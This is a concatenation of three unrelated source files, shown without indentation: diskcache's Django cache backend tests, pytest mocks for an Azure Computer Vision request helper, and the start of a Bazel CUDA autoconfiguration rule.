self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() doesn't store None in the cache.
self.assertEqual(cache.get('mykey', 'default'), 'default')
def test_get_or_set_version(self):
cache.get_or_set('brian', 1979, version=2)
with self.assertRaises(TypeError):
cache.get_or_set('brian')
with self.assertRaises(TypeError):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='diskcache.DjangoCache',
))
class DiskCacheTests(BaseCacheTests, TestCase):
"Specific test cases for diskcache.DjangoCache."
def setUp(self):
super(DiskCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Cache location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(DiskCacheTests, self).tearDown()
cache.close()
shutil.rmtree(self.dirname, ignore_errors=True)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
def test_cull(self):
cache.cull()
def test_zero_cull(self):
pass # DiskCache has its own cull strategy.
def test_invalid_key_characters(self):
pass # DiskCache supports any Pickle-able value as a cache key.
def test_invalid_key_length(self):
pass # DiskCache supports any Pickle-able value as a cache key.
def test_directory(self):
self.assertTrue('tmp' in cache.directory)
def test_read(self):
value = b'abcd' * 2 ** 20
result = cache.set(b'test-key', value)
self.assertTrue(result)
with cache.read(b'test-key') as reader:
self.assertEqual(reader.read(), value)
try:
with cache.read(b'dne') as reader:
error = False
except KeyError:
error = True
self.assertTrue(error)
def test_expire(self):
cache.clear()
cache.set(b'expire-key', 0, timeout=0.05)
time.sleep(0.1)
self.assertEqual(cache.expire(), 1)
self.assertEqual(cache.get(b'expire-key'), None)
def test_evict(self):
cache.clear()
for num in range(100):
cache.set(num, num, tag=(num % 4))
self.assertEqual(cache.evict(1), 25)
cache.create_tag_index()
self.assertEqual(cache.evict(2), 25)
cache.drop_tag_index()
self.assertEqual(cache.evict(3), 25)
for num in range(0, 100, 4):
self.assertEqual(cache.get(num), num)
def test_pop(self):
cache.clear()
for num in range(5):
cache.set(num, num, timeout=None)
self.assertEqual(cache.pop(0), 0)
self.assertEqual(cache.pop(0), None)
self.assertEqual(cache.pop(0, 1), 1)
self.assertEqual(cache.pop(0, default=1), 1)
self.assertEqual(cache.pop(1, expire_time=True), (1, None))
self.assertEqual(cache.pop(2, tag=True), (2, None))
self.assertEqual(cache.pop(3, expire_time=True, tag=True), (3, None, None))
self.assertEqual(cache.pop(4, retry=False), 4)
def test_pickle(self):
letters = 'abcde'
cache.clear()
for num, val in enumerate(letters):
cache.set(val, num)
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in letters:
self.assertEqual(other.get(key), cache.get(key))
def test_cache(self):
subcache = cache.cache('test')
directory = os.path.join(cache.directory, 'cache', 'test')
self.assertEqual(subcache.directory, directory)
def test_deque(self):
deque = cache.deque('test')
directory = os.path.join(cache.directory, 'deque', 'test')
self.assertEqual(deque.directory, directory)
def test_index(self):
index = cache.index('test')
directory = os.path.join(cache.directory, 'index', 'test')
self.assertEqual(index.directory, directory)
def test_memoize(self):
with self.assertRaises(TypeError):
@cache.memoize # <-- Missing parens!
def test():
pass
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
self.assertEqual(fibrec(value), fibiter(value))
hits1, misses1 = cache.stats()
for value in range(count):
self.assertEqual(fibrec(value), fibiter(value))
hits2, misses2 = cache.stats()
self.assertEqual(hits2, hits1 + count)
self.assertEqual(misses2, misses1)
|
import pytest
import os
import logging
import requests_helper
@pytest.fixture
def valid_post_image():
return open('_test/src/img001.jpg', 'rb')
@pytest.fixture
def valid_post_url():
return os.environ['COMPUTER_VISION_ENDPOINT'] + "/vision/v3.0/read/analyze"
@pytest.fixture
def valid_headers():
return {
'Ocp-Apim-Subscription-Key': os.environ['COMPUTER_VISION_KEY'],
'Content-Type': 'application/octet-stream'
}
@pytest.fixture
def valid_get_url():
return "operation-location"
class MockResponse:
def __init__(self, json_data, status_code, headers):
self.json_data = json_data
self.status_code = status_code
self.headers = headers
def json(self):
return self.json_data
def test_post_response_is_ok(mocker, valid_post_url, valid_headers, valid_post_image):
mock_post = mocker.patch('requests_helper.requests.post')
mock_post.return_value = MockResponse(None, 202, { "Operation-Location": "a-valid-url" })
response = requests_helper.post_image(valid_post_url, valid_headers, valid_post_image)
assert(response.headers["Operation-Location"]) == "a-valid-url"
def test_post_response_handles_500_error(mocker, valid_post_url, valid_headers, valid_post_image):
mock_post = mocker.patch('requests_helper.requests.post')
mock_post.return_value = MockResponse({"error": {"code": "FailedToProcess", "message": "The analyze request could not be started due to a cluster-related issue. Please resubmit the document for processing."}}, 500, {})
response = requests_helper.post_image(valid_post_url, valid_headers, valid_post_image)
assert response == { "status_code": 500, "code": "FailedToProcess", "message": "The analyze request could not be started due to a cluster-related issue. Please resubmit the document for processing."}
def test_get_read_result_is_ok(mocker, valid_headers):
mock_get = mocker.patch('requests_helper.requests.get')
mock_get.return_value = MockResponse( {"analyzeResult": { "lines": [{"text": "this is text"}]}}, 200, {})
response = requests_helper.get_read_result(valid_get_url, valid_headers)
assert response.json()["analyzeResult"] is not None
def test_get_read_result_handles_error(mocker, valid_headers, valid_get_url):
mock_get = mocker.patch('requests_helper.requests.get')
mock_get.return_value = MockResponse({"error": { "code": "fail", "message": "because"}}, 500, {})
response = requests_helper.get_read_result(valid_get_url, valid_headers)
assert response["code"] == "fail"
|
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `TF_SYSROOT`: The sysroot to use when compiling.
* `TF_DOWNLOAD_CLANG`: Whether to download a recent release of clang
compiler and use it to build tensorflow. When this option is set
CLANG_CUDA_COMPILER_PATH is ignored.
* `TF_CUDA_PATHS`: The base paths to look for CUDA and cuDNN. Default is
`/usr/local/cuda,usr/`.
* `CUDA_TOOLKIT_PATH` (deprecated): The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH` (deprecated): The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
`3.5,5.2`.
* `PYTHON_BIN_PATH`: The python binary path
"""
load("//third_party/clang_toolchain:download_clang.bzl", "download_clang")
load(
"@bazel_tools//tools/cpp:lib_cc_configure.bzl",
"escape_string",
"get_env_var",
)
load(
"@bazel_tools//tools/cpp:windows_cc_configure.bzl",
"find_msvc_tool",
"find_vc_path",
"setup_vc_env_vars",
)
load(
"//third_party/remote_config:common.bzl",
"config_repo_label",
"err_out",
"execute",
"get_bash_bin",
"get_cpu_value",
"get_host_environ",
"get_python_bin",
"is_windows",
"raw_exec",
"read_dir",
"realpath",
"which",
)
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_GCC_HOST_COMPILER_PREFIX = "GCC_HOST_COMPILER_PREFIX"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_TF_SYSROOT = "TF_SYSROOT"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
_TF_DOWNLOAD_CLANG = "TF_DOWNLOAD_CLANG"
_PYTHON_BIN_PATH = "PYTHON_BIN_PATH"
def to_list_of_strings(elements):
"""Convert the list of ["a", "b", "c"] into '"a", "b", "c"'.
This is to be used to put a list of strings into the bzl file templates
so it gets interpreted as list of strings in Starlark.
Args:
elements: list of string elements
Returns:
single string of elements wrapped in quotes separated by a comma."""
quoted_strings = ["\"" + element + "\"" for element in elements]
return ", ".join(quoted_strings)
def verify_build_defines(params):
"""Verify all variables that crosstool/BUILD.tpl expects are substituted.
Args:
params: dict of variables that will be passed to the BUILD.tpl template.
"""
missing = []
for param in [
"cxx_builtin_include_directories",
"extra_no_canonical_prefixes_flags",
"host_compiler_path",
"host_compiler_prefix",
"host_compiler_warnings",
"linker_bin_path",
"compiler_deps",
"msvc_cl_path",
"msvc_env_include",
"msvc_env_lib",
"msvc_env_path",
"msvc_env_tmp",
"msvc_lib_path",
"msvc_link_path",
"msvc_ml_path",
"unfiltered_compile_flags",
"win_compiler_deps",
]:
if ("%{" + param + "}") not in params:
missing.append(param)
if missing:
auto_configure_fail(
"BUILD.tpl template is missing these variables: " +
str(missing) +
".\nWe only got: " +
str(params) +
".",
)
def _get_nvcc_tmp_dir_for_windows(repository_ctx):
"""Return the Windows tmp directory for nvcc to generate intermediate source files."""
escaped_tmp_dir = escape_string(
get_env_var(repository_ctx, "TMP", "C:\\Windows\\Temp").replace(
"\\",
"\\\\",
),
)
return escaped_tmp_dir + "\\\\nvcc_inter_files_tmp_dir"
def _get_msvc_compiler(repository_ctx):
vc_path = find_vc_path(repository_ctx)
return find_msvc_tool(repository_ctx, vc_path, "cl.exe").replace("\\", "/")
def _get_win_cuda_defines(repository_ctx):
"""Return CROSSTOOL defines for Windows"""
# If we are not on Windows, return fake vaules for Windows specific fields.
# This ensures the CROSSTOOL file parser is happy.
if not is_windows(repository_ctx):
return {
"%{msvc_env_tmp}": "msvc_not_used",
"%{msvc_env_path}": "msvc_not_used",
"%{msvc_env_include}": "msvc_not_used",
"%{msvc_env_lib}": "msvc_not_used",
"%{msvc_cl_path}": "msvc_not_used",
"%{msvc_ml_path}": "msvc_not_used",
"%{msvc_link_path}": "msvc_not_used",
"%{msvc_lib_path}": "msvc_not_used",
}
vc_path = find_vc_path(repository_ctx)
if not vc_path:
auto_configure_fail(
"Visual C++ build tools not found on your machine." +
"Please check your installation following https://docs.bazel.build/versions/master/windows.html#using",
)
return {}
env = setup_vc_env_vars(repository_ctx, vc_path)
escaped_paths = escape_string(env["PATH"])
escaped_include_paths = escape_string(env["INCLUDE"])
escaped_lib_paths = escape_string(env["LIB"])
escaped_tmp_dir = escape_string(
get_env_var(repository_ctx, "TMP", "C:\\Windows\\Temp").replace(
"\\",
"\\\\",
),
)
msvc_cl_path = get_python_bin(repository_ctx)
msvc_ml_path = find_msvc_tool(repository_ctx, vc_path, "ml64.exe").replace(
"\\",
"/",
)
msvc_link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe").replace(
"\\",
"/",
)
msvc_lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe").replace(
"\\",
"/",
)
# nvcc will generate some temporary source files under %{nvcc_tmp_dir}
# The generated files are guaranteed to have unique name, so they can share
# the same tmp directory
escaped_cxx_include_directories = [
_get_nvcc_tmp_dir_for_windows(repository_ctx),
"C:\\\\botcode\\\\w",
]
for path in escaped_include_paths.split(";"):
if path:
escaped_cxx_include_directories.append(path)
return {
"%{msvc_env_tmp}": escaped_tmp_dir,
"%{msvc_env_path}": escaped_paths,
"%{msvc_env_include}": escaped_include_paths,
"%{msvc_env_lib}": escaped_lib_paths,
"%{msvc_cl_path}": msvc_cl_path,
"%{msvc_ml_path}": msvc_ml_path,
"%{msvc_link_path}": msvc_link_path,
"%{msvc_lib_path}": msvc_lib_path,
"%{cxx_builtin_include_directories}": to_list_of_strings(
escaped_cxx_include_directories,
),
}
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
"""Find the C++ compiler."""
if is_windows(repository_ctx):
return _get_msvc_compiler(repository_ctx)
if _use_cuda_clang(repository_ctx):
target_cc_name = "clang"
cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
if _flag_enabled(repository_ctx, _TF_DOWNLOAD_CLANG):
return "extra_tools/bin/clang"
else:
target_cc_name = "gcc"
cc_path_envvar = _GCC_HOST_COMPILER_PATH
cc_name = target_cc_name
cc_name_from_env = get_host_environ(repository_ctx, cc_path_envvar)
if cc_name_from_env:
cc_name = cc_name_from_env
if cc_name.startswith("/"):
# Absolute path, maybe we should make this supported by our which function.
return cc_name
cc = which(repository_ctx, cc_name)
if cc == None:
fail(("Cannot find {}, either correct your path or set the {}" +
" environment variable").format(target_cc_name, cc_path_envvar))
return cc
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX add " (framework directory)" at the end of line, strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
"""Convert path returned by cc -E xc++ in a complete path."""
path = path.strip()
if path.endswith(_OSX_FRAMEWORK_SUFFIX):
path = path[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
return path
def _normalize_include_path(repository_ctx, path):
"""Normalizes include paths before writing them to the crosstool.
If path points inside the 'crosstool' folder of the repository, a relative
path is returned.
If path points outside the 'crosstool' folder, an absolute path is returned.
"""
path = str(repository_ctx.path(path))
crosstool_folder = str(repository_ctx.path(".").get_child("crosstool"))
if path.startswith(crosstool_folder):
# We drop the path to "$REPO/crosstool" and a trailing path separator.
return path[len(crosstool_folder) + 1:]
return path
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp, tf_sysroot):
"""Compute the list of default C or C++ include directories."""
if lang_is_cpp:
lang = "c++"
else:
lang = "c"
sysroot = []
if tf_sysroot:
sysroot += ["--sysroot", tf_sysroot]
result = raw_exec(repository_ctx, [cc, "-E", "-x" + lang, "-", "-v"] +
sysroot)
stderr = err_out(result)
index1 = stderr.find(_INC_DIR_MARKER_BEGIN)
if index1 == -1:
return []
index1 = stderr.find("\n", index1)
if index1 == -1:
return []
index2 = stderr.rfind("\n ")
if index2 == -1 or index2 < index1:
return []
index2 = stderr.find("\n", index2 + 1)
if index2 == -1:
inc_dirs = stderr[index1 + 1:]
else:
inc_dirs = stderr[index1 + 1:index2].strip()
return [
_normalize_include_path(repository_ctx, _cxx_inc_convert(p))
for p in inc_dirs.split("\n")
]
def get_cxx_inc_directories(repository_ctx, cc, tf_sysroot):
"""Compute the list of default C and C++ include directories."""
# For some reason `clang -xc` sometimes returns include paths that are
